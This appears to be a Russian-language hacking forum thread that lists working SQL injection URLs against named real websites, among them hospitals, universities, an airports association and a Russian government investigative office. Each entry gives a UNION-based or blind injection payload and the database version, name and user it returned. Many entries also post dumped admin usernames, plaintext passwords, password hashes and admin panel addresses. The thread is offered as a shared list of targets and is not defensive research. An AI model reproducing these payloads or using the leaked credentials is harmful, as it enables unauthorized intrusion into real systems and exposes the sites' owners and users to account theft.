SQL Инъекции

PHP:

http://www.zora.ru/?a=show&id=-147+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11--

version / 4.0.27-standard-log
database / zora
user / zora@localhost

PHP:

http://www.unitedparts.ru/catalog.php?id=2+union+select+concat_ws(0x3a,version(),database(),user()),2,3,4--

version / 5.0.67-log
database / u44238_3
user / [email protected]

 

http://blackhillslots.com/news/?newsid=-5+UNION+SELECT+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8

Database Version: 5.0.45
Database name: blackhillslotsdb
User name: blackhillslots@localhost

http://midwestalarm.com/news/?newsid=-6+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8

Database Version: 5.0.45
Database name: midwestalarmdb
User name: midwestalarm@localhost


http://klockwerkscycles.com/news.php?newsid=-194+union+select+1,2,concat_ws(0x3a,version(),database(),useR()),4,5,6,7

Database Version: 5.0.45-log
Database name: klockwerksdb
User name: klockwerks@localhost

 

Code:

http://studsovet.wl.dvgu.ru/index.php?id=-375+union+select+concat_ws(0x3a,user_login,user_pass,user_nicename,user_url,user_status)+from+wp_vi_users--

database : 5.0.67

tables : wp_vi_users
log: admin
pass: admin

 

Australian Airports Association (pr5)
хакиры отакуют аэропорты (=

Code:

http://www.aaal.com.au/category.php?id=18+AND+ASCII(SUBSTRING((select+[COLOR=DarkGreen]y[/COLOR]()),1,1))>[COLOR=DarkRed]x[/COLOR]/*

y1=version
y2=database
y3=user

x1=52,46,49,46,49,49,45,68,101,98,105,97,110,95,52,115,97,114,103,100,55
x2=97,97,97,108
x3=97,105,114,112,111,114,116,115,64,108,111,99,97,108,104,111,115,116

version() - 4.1.11-Debian_4sargd7
database() - aaal
user() - airports@localhost
---------------------------------------------------------------------------------------------------------------

 

1 april

http://www.speedcarseries.com/news/index.php?newsid=-101+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11

Database Version: 5.0.41-community
Database name: speedcar
User name: speedcar@localhost



http://dtsf.com/news/index.php?newsid=-302+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6


Database Version: 5.0.45
Database name: dtsfdb
User name: dtsf@localhost
admin:incognito



http://signaturehomesllc.com/news/index.php?newsid=-20+union+select+1,2,concat_ws(0x3a,version(),database(),useR()),4,5,6,7,8,9,10

Database Version: 5.0.51a-3ubuntu5.4
Database name: signaturehomes
User name: signaturehomes@localhost


http://sfseminary.edu/news/index.php?newsid=-198+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8

Database Version: 5.0.45
Database name: sfseminary_edu
User name: sfseminary@localhost
Jokester они сменили базу и движок сайта, но скуля есть...не знаю если это можно считать бояном



http://truth-4-youth.net/news/index.php?newsid=-15+union+select+1,2,concat_ws(0x3a,version(),database(),useR()),4,5,6,7,8,9


Database Version: 4.1.22
Database name: truth4youthdb
User name: truth4youth@localhost


http://brookingshealth.org/news/?newsid=-214+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),useR()),6,7,8,9,10,11--

Database Version: 5.0.45
Database name: brookingshealthdb
User name: brookingshealth@localhost

http://huronregional.org/news/index.php?newsid=-401+union+select+1,2,concat_ws(0x3a,version(),database(),useR()),4,5,6,7,8,9,10,11,12,13&id=58

Database Version: 5.0.45
Database name: huronregionaldb
User name: huronregional@localhost



http://www.luvernecommunityhospital.org/news.php?newsid=-218+union+select+1,2,concat_ws(0x3a,version(),database(),useR()),4,5,6,7,8

Database Version: 5.0.45
Database name: sanfordluvernedb_new
User name: newsanford@localhost



http://nwiowahealthcenter.org/news.php?newsid=-75+union+select+1,2,concat_ws(0x3a,version(),database(),useR()),4,5,6


Database Version: 5.0.45
Database name: northwestiowadb
User name: northwestiowa@localhost


http://prairielakes.com/news/index.php?newsid=-417+union+select+1,2,concat_ws(0x3a,version(),database(),useR()),4,5,6,7,8,9,10,11--


Database Version: 5.0.45
Database name: prairielakesdb
User name: prairielakes@localhost


http://urgentcareemr.com/news/index.php?newsid=-19+union+select+1,2,concat_ws(0x3a,version(),database(),useR()),4,5,6,7,8,9--


Database Version: 5.0.45
Database name: docutapdb
User name: docutap@localhost


http://www.sfsurgical.com/news/index.php?newsid=-5+union+select+1,2,concat_ws(0x3a,version(),database(),useR()),4,5,6,7,8,9



Database Version: 5.0.45
Database name: sfsurgicaldb
User name: sfsurgical@localhost


http://mywellnessadvantage.com/news/index.php?id=&newsid=-6+union+select+1,2,concat_ws(0x3a,version(),database(),useR()),4,5,6,7,8,9


Database Version: 5.0.45
Database name: westernhealthdb
User name: westernhealth@localhost



http://www.welcoa.org/news.php?entryid=-489+union+select+1,2,concat_ws(0x3a,version(),database(),useR()),4,5,6,7,8,9,10,11,12,13,14,15


Database Version: 5.0.45
Database name: welcoadb
User name: welcoa@localhost

 

Code:

http://web-book.ru/index.php?page=details&book=-1+union+select+1,2,3,4,CONCAT_WS(0x2C,USER(),DATABASE(),VERSION()),6,7,8,9,10,11,12

dbuser: [email protected]
dbname: db_tyre1_1
Version: 4.1.22-log

 

обед

User:root
Version:5.0.27-community-nt


[ist.stmary.edu Не боян]

ps: для тех, кто будет искать пути ;-)

=======================================

Version: 5.0.22
User: [email protected]
Dbname: studentservices

table users:
asn:asn
salvesen:jubalon
henryb:henryb
amy:jake
kim:ecolab
tbarrett:tbear

 

directrix.ru ТиЦ 2000 PR 3

PHP:

http://directrix.ru/cat?tag=331212212121231+union+select+1,2,concat_ws(0x3A,user(),@@version,database()),4,5,6,7--+


user(): wwditrix@localhost
version(): 5.0.51a-17vc-log
database(): directrix

 

sql-blind

Code:

http://www.puppets.ru/index.php?id=85'+and+ascii(substring(version(),1,1))=53--+

database: 5.0.51

 

"Официальный сайт следственного управления Следственного комитета..."

Code:

http://www.skprok.tver.ru/news/?new_id=110+and+1=0+union+select+1,2,3,4,5,6,7,8,9,0--

 

Арт-ателье "Костюмер" + информационный портал "Костюмер"
http://www.kostumer.ru/biograph_SB.php3?m=6&id=-1+union+select+1,2,3,4/*
Database Version: 4.1.9-log

 

Code:

http://breadmaker.karasik.org/viewRecipe.php?ID=-10+union+select+1,unhex(hex(concat_ws(0xa,username,user_password))),3,4,5,6,7,8,9+from+karasik_breadboard.phpbb_users+limit+1,1--+

db: 5.0.67-msl-icd1-log
name_db: karasik_breadmaker
user: karasik@localhost

table: phpbb_users
database:karasik_breadboard
login: karasik
pass: kkkVVV
+limit+x,x--+
--------------------------------------------------

Code:

http://prazdnik.com.ua/index.php?id=54&pid=-35180'+union+select+concat_ws(0x3a,version(),database(),user()),2--+

db: 5.0.44
name_db: newprazdnik
user: u_newprazdni@localhost
http://prazdnik.com.ua/admin/

log: prazdnik
pass: 12345

 

Code:

http://www.npo-saturn.ru/!new/?act=gm_look&id=-1238156655+uNioN+SeLecT+1,concat_ws(0x3a,version(),da tabase(),user()),3,4,5,6,7,8,9,10,11,12--

Database Version : 5.0.67
Database name : saturn
User name : [email protected]

адм :

Code:

http://www.npo-saturn.ru/!new/?act=gm_look&id=-1238156655+uNioN+SeLecT+1,concat_ws(0x3a,name,passwd),3,4,5,6,7,8,9,10,11,12+from+s_ users+limit+0,1--

Code:

sokolov_ка:wJwVyTMy_spr
moder:mashaalenamoders

саму админку не нашел

 

Code:

http://www.hdtinfo.com/news/read.php?id=-1+union+all+select+0,concat_ws(version(),user(),database()),2,3,4--

юзер/версия/бд:

Code:

[email protected]

 

Database Version: 5.0.67-community
Database name: pigvomit_dnwwebsite
User name: pigvomit_dorner@localhost

Database Version: 5.0.77-community
Database name: egycoeg_egyco
User name: egycoeg_egyco@localhost

Login: egico
Pass:egico1

Database Version: 5.0.51a-community
Database name: abook_line
User name: abook_linecom@localhost

Около 350 юзеров! Выводить всех юзеров не стал =)

Database Version: 5.0.68-log
Database name: mistelle
User name: [email protected]

Юзеры: http://www.mistelle.fr/news.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,password,username),6,7+from+pun_users--

Database Version: 4.0.24_Debian-10sarge2
Database name: geotekmain
User name: geotekmain@localhost

Database Version: 4.1.22-standard-log
Database name: ecoporg_db
User name: ecoporg_user@localhost

Database Version: 5.0.32-Debian_7etch6-log
Database name: windsurf_com
User name: windsurf_user@localhost

Database Version: 5032-debian_7etch8-log
Database name: aa34
User name: aa34@localhost

Login: admin
Pass: d9c4b5ac3b13e92e26b4e025586d8a8d : dflit

Выводить юзеров с форума с таблы phorum_users

 

<<ЙА-Xxa - Официальный сайт Рашида Нугманова>>

Code:

http://www.yahha.com/article.php?sid=-145+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13--+

db: 5.0.67-community
name_db: yahha_mpn
user: yahha_admin@localhost

table:mpn_authors , db: yahha_mpn

log: RN
pass: xer0mem
Это владелитц сайта (не админ, вход прямо с главной страницы)
-------------------------------------------------------------
limit+186,1--+
table: mpn_users
name: Андрей Дамер
log: damer
pass: 250676
+limit+X,x--+
все юзверы..........
--------------------------------------------------------------

 

На боян проверено в SQL Injections [AntiBoyan] CheckeR
Pr 4
http://campisis.us/locdetail.php?id=2 %26%26 1%3D2 UNION SELECT 1,CONCAT(0x6467797436,CONCAT_WS(0x203A20,VERSION(),DATABASE(),USER()),0x3566646B68),3,4,5,6,7,8,9,10,11,12 %23

VERSION(),DATABASE(),USER()
4.1.22-max-log : campisis : [email protected]

==
PR3
http://hamercaz.com/hamercaz/site/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,version(),12--

5.0.22

==

 

Database Version: 5.0.32-Debian_7etch6-log
Database name: interbridge
User name: interbridge@localhost

Database Version: 5.0.22
Database name: pg_org_spurway
User name: spurway@localhost

Database Version: 4.1.7-log
Database name: fourwinds-rv
User name: [email protected]

Есть доступ к mysql.user
13 юзеров

Имхо, это админ! Пасс рута не выводит((
Login: adminatcomp
Pass:07d8ece224cf7ece : ???


Бильярд по-киевски

Database Version: 5.0.67-community-log
Database name: dupletc_kiev
User name: dupletc_kadm@localhost

 

<<Официальный сайт, футбольного клуба "КаМаЗ" >>

Code:

http://www.fckamaz.ru/pages/news.php?id=-472+union+select+1,concat_ws(0x3a,table_name,table_schema),3,4,5,6,7,8+from+information_schema.columns+where+column_name+like+0x70617373776f7264--+

db: 5.0.75
name_db: fckamazru
user: [email protected]
-------------------
http://www.fckamaz.ru/admin
-------------------

table: wp_users , db: fckamazru_wordpress

log: admin
pass: 03ecc478f8949ec82c3b4a6fcecd0305
-------------------
table: users

log: Спарк
pass: sdfsdt34t34
+limit+x,x--+
-------------------
table: users2007

log: Спарк - (Администратор сайта)
pass: nw21
+limit+x,x--+

--------------------------------------------
--------------------------------------------

Code:

http://www.krainamriy.com/news.php?id=-46+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11--+

db: 4.1.22-log
name_db: krainamriy
user: krainamriy@localhost

 

PR 7

http://www.icimod.org/enews/custom.page.php?id=-1+union+select+1,version()--
4.1.22-standard